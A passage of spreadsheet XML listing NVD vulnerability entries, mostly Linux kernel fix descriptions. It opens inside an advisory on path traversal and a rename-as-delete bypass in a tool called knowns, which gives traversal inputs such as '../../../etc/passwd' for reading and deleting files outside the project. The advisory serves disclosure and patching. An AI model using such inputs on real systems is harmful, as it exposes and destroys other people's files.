### Classic Path Traversal Pattern
Both `DocStore` and `MemoryStore` follow the same vulnerable pattern: user-controlled input is concatenated with a base directory using `filepath.Join()`, then passed directly to file system operations (`os.ReadFile`, `os.WriteFile`, `os.Remove`, `os.Stat`) without any validation.
```go
absPath := filepath.Join(baseDir, filepath.FromSlash(userInput))
// No containment check: strings.HasPrefix(absPath, baseDir)
// No rejection of ".." or absolute paths
```
`filepath.Join` resolves `../` sequences, allowing attackers to escape the intended directory:
- Input: `"../../../etc/passwd"`
- Result: `/project/.knowns/docs/../../../etc/passwd` → `/etc/passwd`
### Rename-as-Delete Authorization Bypass
The `Rename()` function performs two operations:
1. Write the file to the new location (`newAbsPath`)
2. Delete the file from the old location (`oldAbsPath`)
Both paths are vulnerable to traversal. An attacker can:
- Set `path` to a file outside the project (e.g., `"../../../victim/target.md"`)
- Set `newPath` to another location outside the project
- The `Rename()` function will delete the file at `path` (outside the project)
Because `docs.update` is classified as `CapWrite` rather than `CapDelete`, this operation bypasses deletion restrictions in `read-write-no-delete` presets.
### Compounding Factor - Unauthenticated Access
Due to the previously identified **Auth Bypass** vulnerability, all MCP tools are accessible without credentials when the server is started without a password, making this a zero-credential attack.
## Fix
*Patch is available right now at [New Release](https://github.com/knowns-dev/knowns/releases).*</t>
        </is>
      </c>
      <c r="T471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86439</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88389</t>
        </is>
      </c>
      <c r="D472" s="5" t="inlineStr"/>
      <c r="E472" s="5" t="inlineStr"/>
      <c r="F472" s="5" t="inlineStr"/>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="inlineStr"/>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q472" s="5" t="inlineStr"/>
      <c r="R472" s="5" t="inlineStr"/>
      <c r="S472" s="5" t="inlineStr">
        <is>
          <t>Espruino 2v29 (commit bffc6d0) contains a NULL pointer dereference vulnerability in jslGetRawString() in src/jslex.c. Crafted raw/binary string input can cause the lexer to pass a NULL iterator target to jsvLockAgain(). In RELEASE/NO_ASSERT builds, the missing assertion guard allows a write through the NULL pointer, resulting in memory corruption and application termination or denial of service.</t>
        </is>
      </c>
      <c r="T472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88389</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88420</t>
        </is>
      </c>
      <c r="D473" s="5" t="inlineStr"/>
      <c r="E473" s="5" t="inlineStr"/>
      <c r="F473" s="5" t="inlineStr"/>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="inlineStr"/>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr"/>
      <c r="K473" s="5" t="inlineStr"/>
      <c r="L473" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q473" s="5" t="inlineStr"/>
      <c r="R473" s="5" t="inlineStr"/>
      <c r="S473" s="5" t="inlineStr">
        <is>
          <t>A reflected cross-site scripting (XSS) vulnerability in the EntryAbstract.save() component of APSL puput v1.2.1 through v2.2.0 allows authenticated attackers with Wagtail Editor privileges to execute arbitrary code in the context of the victim's browser via a crafted payload.</t>
        </is>
      </c>
      <c r="T473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88420</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92564</t>
        </is>
      </c>
      <c r="D474" s="5" t="inlineStr"/>
      <c r="E474" s="5" t="inlineStr"/>
      <c r="F474" s="5" t="inlineStr"/>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q474" s="5" t="inlineStr"/>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S474" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type nesting to cause a StackOverflowError potentially leading to denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92564</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9313</t>
        </is>
      </c>
      <c r="D475" s="5" t="inlineStr"/>
      <c r="E475" s="5" t="inlineStr"/>
      <c r="F475" s="5" t="inlineStr"/>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="inlineStr"/>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr"/>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q475" s="5" t="inlineStr"/>
      <c r="R475" s="5" t="inlineStr"/>
      <c r="S475" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9313</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9652</t>
        </is>
      </c>
      <c r="D476" s="5" t="inlineStr"/>
      <c r="E476" s="5" t="inlineStr"/>
      <c r="F476" s="5" t="inlineStr"/>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="inlineStr"/>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr"/>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9652</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9655</t>
        </is>
      </c>
      <c r="D477" s="5" t="inlineStr"/>
      <c r="E477" s="5" t="inlineStr"/>
      <c r="F477" s="5" t="inlineStr"/>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="inlineStr"/>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr"/>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9655</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97522</t>
        </is>
      </c>
      <c r="D478" s="5" t="inlineStr"/>
      <c r="E478" s="5" t="inlineStr"/>
      <c r="F478" s="5" t="inlineStr"/>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="inlineStr"/>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr"/>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr"/>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix bad accounting in __mptcp_subflow_push_pending()
If __subflow_push_pending() errors out we should avoid updating the
copied byte counters, to avoid mismatch push call later on.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97522</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97526</t>
        </is>
      </c>
      <c r="D479" s="5" t="inlineStr"/>
      <c r="E479" s="5" t="inlineStr"/>
      <c r="F479" s="5" t="inlineStr"/>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="inlineStr"/>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr"/>
      <c r="K479" s="5" t="inlineStr"/>
      <c r="L479" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr"/>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/pai: Support CPU hotplug for PMU PAI
The command 'perf stat -e pai_crypto/CRYPTO_ALL/ -- &lt;command&gt;'
crashes the kernel when CPUs are hotplug added during that run.
Root cause is the missing allocation of per-CPU data structures
for that new CPU. The allocation is dynamic and the first
event that has task context creates such a structure for
each online CPU. This is not sufficient. CPUs may be offline
during event creation and can be set online during the
perf run time. For example commands
 # echo 0 &gt; /sys/devices/system/cpu/cpu1/online
 # perf stat -e cycles -i -- stress-ng -t10s --matrix X
 # sleep 1
 # echo 1 &gt; /sys/devices/system/cpu/cpu1/online
Currently without a CPU hotplug handler, that new CPU has no
per-CPU data infrastructure. The scheduler runs PMU call back
function pai_add() to install the PMU support for that CPU before
the task is being scheduled on that new CPU.
In pai_add() instructions
    mp = this_cpu_ptr(pai_root[idx].mapptr);
    cpump = mp-&gt;mapptr;
return a NULL pointer and the result is a kernel panic as variable
cpump is used inside that function.
Add CPU hotplug support for CPU add and delete and create
the necessary per-CPU data infrastructure during CPU hotplug
add processing. Same for CPU hotplug remove.
This is done when the CPU is offline to ensure the data structures
are available when CPU is made online and tasks are scheduled on it.
[hca@linux.ibm.com: fixup error path in pai_init()]</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97526</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97529</t>
        </is>
      </c>
      <c r="D480" s="5" t="inlineStr"/>
      <c r="E480" s="5" t="inlineStr"/>
      <c r="F480" s="5" t="inlineStr"/>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="inlineStr"/>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr"/>
      <c r="K480" s="5" t="inlineStr"/>
      <c r="L480" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr"/>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Validate BSG request_len before reading vendor_cmd[]
The FC BSG transport allocates job-&gt;request via memdup_user() using the
exact user-supplied request_len. For FC_BSG_HST_VENDOR,
fc_bsg_host_dispatch() only guarantees request_len covers msgcode and
vendor_id; it does not account for the vendor_cmd[] flexible array.
qla2xxx then reads the command selector vendor_cmd[0] and, in several
sub-handlers, vendor_cmd[1]/[2] or structures overlaid on the vendor
command area without verifying request_len. A caller holding
CAP_SYS_RAWIO can submit a short request whose vendor_id matches the
host, triggering out-of-bounds heap reads (KASAN-detectable, and able to
mis-select a command or panic).
Add a central guard in qla2x00_process_vendor_specific() so the selector
is always in bounds, restrict the early vendor_cmd[0] read in
qla24xx_bsg_request() to sufficiently long vendor messages, and add
request_len checks to the sub-handlers that read further:
qla24xx_proc_fcp_prio_cfg_cmd(), qla2x00_process_loopback(),
qla84xx_reset(), qla84xx_updatefw(), qla2x00_read_optrom(),
qla2x00_update_optrom(), qlafx00_mgmt_cmd() and
qla28xx_validate_flash_image().</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97529</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97530</t>
        </is>
      </c>
      <c r="D481" s="5" t="inlineStr"/>
      <c r="E481" s="5" t="inlineStr"/>
      <c r="F481" s="5" t="inlineStr"/>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr"/>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix soft lockup polling continuation IOCB signature
qla27xx_copy_multiple_pkt() and qla27xx_copy_fpin_pkt() poll
rsp_q-&gt;ring_ptr-&gt;signature for RESPONSE_PROCESSED (0xDEADDEAD) to decide
whether the next continuation IOCB has arrived, spinning on cpu_relax()
without advancing the ring or decrementing the entry count while it has
not. response_t::signature lives at byte offset 60, but a continuation
IOCB (sts_cont_entry_t / struct sts_cont_entry_ext) carries raw FC frame
payload at that offset (data[56..59]). A received frame whose payload
bytes happen to equal 0xDEADDEAD is therefore misread as "not yet
arrived", and the loop spins forever in interrupt/DPC context, causing a
CPU soft lockup.
The poll is also unnecessary: callers of qla27xx_copy_multiple_pkt()
(PT_LS4_UNSOL and the NVMe purls path) already gate on
qla_chk_cont_iocb_avail(), which guarantees all entry_count IOCBs are
present before copying begins. The sibling helper
__qla_copy_purex_to_buffer() already drops the signature poll and relies
on the entry_type == STATUS_CONT_TYPE guard instead.
Remove the signature busy-wait from both helpers, keeping the entry_type
guard, and gate the FPIN path with qla_chk_cont_iocb_avail() so it defers
and re-processes on the next interrupt once all continuation IOCBs have
arrived, mirroring the ELS_AUTH_ELS and PT_LS4_UNSOL arms. With this the
signature field is never read on a continuation IOCB, eliminating the
payload-aliasing lockup.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97530</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97532</t>
        </is>
      </c>
      <c r="D482" s="5" t="inlineStr"/>
      <c r="E482" s="5" t="inlineStr"/>
      <c r="F482" s="5" t="inlineStr"/>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr"/>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Null out freed pointers in qla2x00_mem_alloc() error path
When qla2x00_mem_alloc() fails, qla2x00_probe_one() jumps to
probe_hw_failed and calls qla2x00_mem_free(). Several error labels in
qla2x00_mem_alloc() freed adapter members (elsrej.c, purex_dma_pool,
flt, sfp_data, loop_id_map, async_pd, sf_init_cb, ex_init_cb, npiv_info)
but left the pointers dangling. qla2x00_mem_free() then freed them a
second time. Worse, for the dma_pool members it issued
dma_pool_free(ha-&gt;s_dma_pool, ...) after s_dma_pool had already been
destroyed and set to NULL at fail_s_dma_pool, dereferencing a NULL pool.
Clear each freed pointer (and its DMA handle) in the error labels so the
subsequent qla2x00_mem_free() skips them.</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97532</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97533</t>
        </is>
      </c>
      <c r="D483" s="5" t="inlineStr"/>
      <c r="E483" s="5" t="inlineStr"/>
      <c r="F483" s="5" t="inlineStr"/>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr"/>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Acquire init_mm read lock on attribute changes to avoid UAF
A previous commit protected against races between ptdump and CPA collapse,
however one still exists between attribute changes and collapse as reported
by Denis V. Lunev (linked).
When an attribute change arises, a lockless page table walker obtains a PTE
entry, which is later written to via set_pte_atomic():
  ...
  -&gt; change_page_attr_set_clr()
  -&gt; __change_page_attr_set_clr()
  -&gt; __change_page_attr()
	-&gt; _lookup_address_cpa()
	-&gt; lookup_address_in_pgd_attr()
	-&gt; [ lockless page table walker ]
  -&gt; set_pte_atomic()
There is nothing preventing a concurrent CPA collapse which can free the
PTE that was retrieved here, resulting in a use-after-free.
With the mmap write lock taken on init_mm over CPA collapse, resolve this
race by acquiring an mmap read lock on init_mm over
__change_page_attr_set_clr().
This locks across the whole operation over which the walk and the PTE
entry write occurs, solving the race.
It is safe to do this here, as no spinlocks are held upon entry to
__change_page_attr_set_clr().
However, the lock must not be held over an allocation, as allocation can
trigger reclaim and shrinkers may call into CPA recursively, making
deadlocks possible (init_mm -&gt; ... -&gt; fs_reclaim -&gt; init_mm).
A page table is allocated when a huge page needs to be split:
  -&gt; change_page_attr_set_clr()
  -&gt; __change_page_attr_set_clr()
  -&gt; __change_page_attr()
  -&gt; split_large_page()
  [ pagetable_alloc() ]
  -&gt; __split_large_page()
Avoid deadlocks by dropping the mmap lock across pagetable_alloc() in
split_large_page() and track whether this is needed by adding a new
'init_mm_read_locked' flag to struct cpa_data.
This is safe as __split_large_page() (called with locks re-established)
revalidates that the page table entry is the same as it was prior to the
locks being dropped and __change_page_attr() repeats the entire page table
walk whenever a split occurs, so concurrent split and collapse are
accounted for.
Concurrent ptdump is also safe as the lock is only dropped over page table
allocation during which time the page table has not yet been modified.
The CPA_COLLAPSE flag is only set by set_memory_rox(), which exclusively
operates upon vmalloc ranges, and on x86 only within the module mapping
space.
This is important, because some callers directly invoke
__change_page_attr_set_clr(), bypassing this lock. However, none of these
operate within the module mapping space.
  * cpa_process_alias() - a recursive helper called by
    __change_page_attr_set_clr().
  * __set_memory_enc_pgtable() - operates on the direct mapping and (via
    __vmbus_establish_gpadl()) the vmalloc mapping space.
  * __set_pages_[n]p() - called by set_direct_map_[invalid, default,
    valid]_noflush(), __kernel_map_pages() - operates on the direct map.
  * kernel_[un]map_pages_in_pgd() - operates on EFI ranges.
This work is based upon Denis V. Lunev's excellent analysis of the bug
with gratitude.
[ dhansen: move to imperative voice in changelog ]</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97533</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97534</t>
        </is>
      </c>
      <c r="D484" s="5" t="inlineStr"/>
      <c r="E484" s="5" t="inlineStr"/>
      <c r="F484" s="5" t="inlineStr"/>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr"/>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: accurately adjust free_sections during free_segment_range
In free_segment_range(), MAIN_SECS(sbi) is temporarily reduced by `secs`
to restrict block allocation to the safe remaining main area while valid
blocks in the truncated range are evacuated by GC.
However, FREE_I(sbi)-&gt;free_sections tracks the total number of free
sections across the whole filesystem. If any sections within the
truncated range were already free upon entering free_segment_range(),
failing to deduct them from free_sections causes the filesystem to
overestimate available free sections in the active, reduced main area.
This leads to inconsistent free section accounting during GC data
migration and can trigger unexpected allocation failures or assertion
errors when space is tight.
Fix this by calculating the number of already-free sections in the
truncated range, deducting them from free_sections upon entering
free_segment_range(), and restoring them on exit.</t>
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97534</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97535</t>
        </is>
      </c>
      <c r="D485" s="5" t="inlineStr"/>
      <c r="E485" s="5" t="inlineStr"/>
      <c r="F485" s="5" t="inlineStr"/>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr"/>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
